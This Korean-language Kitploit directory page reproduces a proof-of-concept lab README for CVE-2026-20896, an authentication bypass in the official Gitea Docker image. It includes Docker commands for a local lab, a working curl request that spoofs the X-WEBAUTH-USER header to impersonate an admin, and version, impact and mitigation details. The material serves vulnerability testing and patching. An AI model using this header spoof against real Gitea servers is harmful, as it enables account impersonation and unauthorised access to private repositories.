Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

피드문의개인정보© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-20896 — CVE-2026-20896을 시연하는 개념 증명(Proof-of-concept) 랩과 Python/cURL 스크립트로, X-WEBAUTH-USER 헤더를 통한 공식 Gitea Docker 이미지의 인증 우회 취약점입니다. | Kitploit
도구/GitHubGitHub/yym8538/cve-2026-20896
Container SecurityVulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingAuthenticationLabs & Practice
GitHubyym8538/cve-2026-20896

CVE-2026-20896

CVE-2026-20896을 시연하는 개념 증명(Proof-of-concept) 랩과 Python/cURL 스크립트로, X-WEBAUTH-USER 헤더를 통한 공식 Gitea Docker 이미지의 인증 우회 취약점입니다.

저장소 보기
11개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-20896: Gitea Docker 이미지 인증 우회 PoC

[!WARNING] 이 PoC는 로컬 랩 환경이나 테스트 권한을 명시적으로 부여받은 시스템에서만 사용하십시오.

https://github.com/user-attachments/assets/b73af2fe-0e59-438b-80d6-be93fd75697b

개요

CVE-2026-20896은 영향을 받는 공식 Gitea Docker 이미지의 인증 우회 취약점입니다. 리버스 프록시 인증이 활성화된 경우, 이미지에서 생성되는 REVERSE_PROXY_TRUSTED_PROXIES = * 설정으로 인해 Gitea 백엔드에 접근할 수 있는 클라이언트가 X-WEBAUTH-USER 헤더를 통해 기존 사용자로 위장할 수 있습니다.

이 랩은 무작위 비밀번호를 가진 gitea-admin이라는 관리자를 생성하고, 비공개 저장소 gitea-admin/private-proof에 CVE-2026-20896_AUTH_BYPASS_CONFIRMED를 저장합니다. 무작위 관리자 비밀번호를 모른 채 해당 파일을 읽는 것이 우회를 입증합니다.

영향받는 버전

분류버전
취약공식 gitea/gitea Docker 이미지 ≤ 1.26.2
최초 패치1.26.3
권장1.26.4 이상

취약한 구성은 리버스 프록시 인증이 활성화되어 있고 Gitea 백엔드에 직접 접근할 수 있거나, 업스트림 프록시가 공격자가 제공한 신원 헤더를 보존하는 경우를 요구합니다. 이 로컬 재현에는 리버스 프록시 컨테이너가 필요하지 않습니다.

환경

# build
docker build -t cve-2026-20896-gitea-vuln .

# run
docker run -d --rm --name cve-2026-20896-gitea-vuln -p 127.0.0.1:3000:3000 cve-2026-20896-gitea-vuln

Gitea와 비공개 증명 저장소가 초기화될 때까지 몇 초간 기다립니다.

PoC

cURL

curl -s -L -H "X-WEBAUTH-USER: gitea-admin" http://127.0.0.1:3000/gitea-admin/private-proof/raw/branch/main/proof.txt

성공적으로 익스플로잇되면 CVE-2026-20896_AUTH_BYPASS_CONFIRMED가 반환됩니다.

Python

python poc.py http://127.0.0.1:3000

이 스크립트는 인증되지 않은 요청, 비관리자 요청, 위조된 관리자 요청을 비교하고 권한 부여 우회가 확인되면 VULNERABLE을 출력합니다. Python 3.10 이상이 필요하며 표준 라이브러리만 사용합니다.

영향

  • 알려졌거나 추측 가능한 Gitea 사용자로의 위장
  • 비공개 저장소 및 사용자 리소스에 대한 무단 접근
  • 관리자 계정으로 위장한 경우의 관리 작업 수행

완화

  • Gitea 1.26.3 이상으로 업그레이드하십시오. 1.26.4 이상을 권장합니다.
  • REVERSE_PROXY_TRUSTED_PROXIES를 신뢰할 수 있는 프록시 주소로 제한하십시오.
  • Gitea 백엔드에 대한 직접 접근을 차단하고 외부에서 제공된 신원 헤더를 덮어쓰십시오.
  • 리버스 프록시 인증이 필요하지 않은 경우 비활성화하십시오.

정리

docker stop cve-2026-20896-gitea-vuln

참고 자료

  • Gitea 보안 권고 GHSA-f75j-4cw6-rmx4
  • Gitea 1.26.3 및 1.26.4 릴리스 공지
  • Gitea 보안 수정 PR #38151
도구 다운로드